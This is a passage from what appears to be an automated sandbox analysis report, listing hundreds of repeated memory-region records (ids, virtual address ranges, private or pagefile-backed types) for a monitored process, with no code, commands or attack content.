= 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8656 start_va = 0x15e0000 end_va = 0x18fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 8657 start_va = 0x1900000 end_va = 0x1c1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001900000" filename = "" Region: id = 8658 start_va = 0x15e0000 end_va = 0x29e8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 8659 start_va = 0x29f0000 end_va = 0x3df8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029f0000" filename = "" Region: id = 8660 start_va = 0x15e0000 end_va = 0x29e8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 8661 start_va = 0x29f0000 end_va = 0x3df8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029f0000" filename = "" Region: id = 8662 start_va = 0x15e0000 end_va = 0x29e8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 8663 start_va = 0x29f0000 end_va = 0x3df8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029f0000" filename = "" Region: id = 8664 start_va = 0x15e0000 end_va = 0x29e8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 8665 start_va = 0x29f0000 end_va = 0x3df8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029f0000" filename = "" Region: id = 8666 start_va = 0x15e0000 end_va = 0x29e8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 8667 start_va = 0x29f0000 end_va = 0x3df8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029f0000" filename = "" Region: id = 8668 start_va = 0xce0000 end_va = 0xceffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ce0000" filename = "" Region: id = 8669 start_va = 0xce0000 end_va = 0xcf1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ce0000" filename = "" Region: id = 8670 start_va = 0xd00000 end_va = 0xd0dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000d00000" filename = "" Region: id = 8671 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8672 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8673 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8674 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8675 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8676 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8677 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8678 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8679 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8680 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8681 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8682 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8683 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8684 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8685 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8686 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8687 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8688 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8689 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8690 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8709 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8710 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8711 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8712 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8713 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8714 start_va = 0x15e0000 end_va = 0x18fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 8715 start_va = 0x1900000 end_va = 0x1c1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001900000" filename = "" Region: id = 8716 start_va = 0x15e0000 end_va = 0x29e8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 8717 start_va = 0x29f0000 end_va = 0x3df8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029f0000" filename = "" Region: id = 8718 start_va = 0x15e0000 end_va = 0x29e8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 8719 start_va = 0x29f0000 end_va = 0x3df8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029f0000" filename = "" Region: id = 8720 start_va = 0x15e0000 end_va = 0x29e8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 8721 start_va = 0x29f0000 end_va = 0x3df8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029f0000" filename = "" Region: id = 8722 start_va = 0x15e0000 end_va = 0x29e8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 8723 start_va = 0x29f0000 end_va = 0x3df8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029f0000" filename = "" Region: id = 8724 start_va = 0x15e0000 end_va = 0x29e8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 8725 start_va = 0x29f0000 end_va = 0x3df8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029f0000" filename = "" Region: id = 8726 start_va = 0xce0000 end_va = 0xceffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ce0000" filename = "" Region: id = 8727 start_va = 0xce0000 end_va = 0xcf1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ce0000" filename = "" Region: id = 8728 start_va = 0xd00000 end_va = 0xd0dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000d00000" filename = "" Region: id = 8729 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8730 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8731 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8732 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8733 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8734 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8743 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8744 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8745 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8746 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8747 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8748 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8749 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8750 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8751 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8752 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8753 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8754 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8755 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8756 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8757 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8758 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8759 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8760 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8761 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8762 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8763 start_va = 0x15e0000 end_va = 0x18fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 8764 start_va = 0x1900000 end_va = 0x1c1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001900000" filename = "" Region: id = 8765 start_va = 0x15e0000 end_va = 0x29e8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 8766 start_va = 0x29f0000 end_va = 0x3df8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029f0000" filename = "" Region: id = 8767 start_va = 0x15e0000 end_va = 0x29e8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 8768 start_va = 0x29f0000 end_va = 0x3df8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029f0000" filename = "" Region: id = 8769 start_va = 0x15e0000 end_va = 0x29e8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 8770 start_va = 0x29f0000 end_va = 0x3df8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029f0000" filename = "" Region: id = 8771 start_va = 0x15e0000 end_va = 0x29e8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 8772 start_va = 0x29f0000 end_va = 0x3df8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029f0000" filename = "" Region: id = 8773 start_va = 0x15e0000 end_va = 0x29e8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 8774 start_va = 0x29f0000 end_va = 0x3df8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029f0000" filename = "" Region: id = 8775 start_va = 0xce0000 end_va = 0xceffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ce0000" filename = "" Region: id = 8776 start_va = 0xce0000 end_va = 0xcf1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ce0000" filename = "" Region: id = 8777 start_va = 0xd00000 end_va = 0xd0dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000d00000" filename = "" Region: id = 8778 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8779 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8780 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8781 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8782 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8783 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8784 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8785 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8786 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8787 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8788 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8789 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8790 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8791 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8792 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8793 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8794 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8795 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8796 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8797 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8798 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8799 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8800 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8801 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8802 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8803 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8804 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8805 start_va = 0x15e0000 end_va = 0x18fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 8806 start_va = 0x1900000 end_va = 0x1c1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001900000" filename = "" Region: id = 8807 start_va = 0x15e0000 end_va = 0x29e8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 8808 start_va = 0x29f0000 end_va = 0x3df8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029f0000" filename = "" Region: id = 8809 start_va = 0x15e0000 end_va = 0x29e8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 8810 start_va = 0x29f0000 end_va = 0x3df8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029f0000" filename = "" Region: id = 8811 start_va = 0x15e0000 end_va = 0x29e8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 8812 start_va = 0x29f0000 end_va = 0x3df8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029f0000" filename = "" Region: id = 8813 start_va = 0x15e0000 end_va = 0x29e8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 8814 start_va = 0x29f0000 end_va = 0x3df8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029f0000" filename = "" Region: id = 8815 start_va = 0x15e0000 end_va = 0x29e8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 8816 start_va = 0x29f0000 end_va = 0x3df8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029f0000" filename = "" Region: id = 8817 start_va = 0xce0000 end_va = 0xceffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ce0000" filename = "" Region: id = 8818 start_va = 0xce0000 end_va = 0xcf1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ce0000" filename = "" Region: id = 8819 start_va = 0xd00000 end_va = 0xd0dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000d00000" filename = "" Region: id = 8825 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8826 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8827 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8828 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8829 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8830 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8831 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8832 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8833 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8834 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8835 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8836 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8837 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8838 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8839 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8840 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8841 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8842 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8843 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8844 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8845 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8846 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8847 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8848 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8849 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8850 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8851 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8852 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8853 start_va = 0x15e0000 end_va = 0x18fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 8854 start_va = 0x1900000 end_va = 0x1c1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001900000" filename = "" Region: id = 8855 start_va = 0x15e0000 end_va = 0x29e8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 8856 start_va = 0x29f0000 end_va = 0x3df8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029f0000" filename = "" Region: id = 8857 start_va = 0x15e0000 end_va = 0x29e8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 8858 start_va = 0x29f0000 end_va = 0x3df8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029f0000" filename = "" Region: id = 8860 start_va = 0x15e0000 end_va = 0x29e8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 8861 start_va = 0x29f0000 end_va = 0x3df8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029f0000" filename = "" Region: id = 8862 start_va = 0x15e0000 end_va = 0x29e8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 8863 start_va = 0x29f0000 end_va = 0x3df8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029f0000" filename = "" Region: id = 8864 start_va = 0x15e0000 end_va = 0x29e8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 8865 start_va = 0x29f0000 end_va = 0x3df8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029f0000" filename = "" Region: id = 8866 start_va = 0xce0000 end_va = 0xceffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ce0000" filename = "" Region: id = 8867 start_va = 0xce0000 end_va = 0xcf1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ce0000" filename = "" Region: id = 8868 start_va = 0xd00000 end_va = 0xd0dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000d00000" filename = "" Region: id = 8869 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8870 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8871 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8872 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8873 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8874 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = 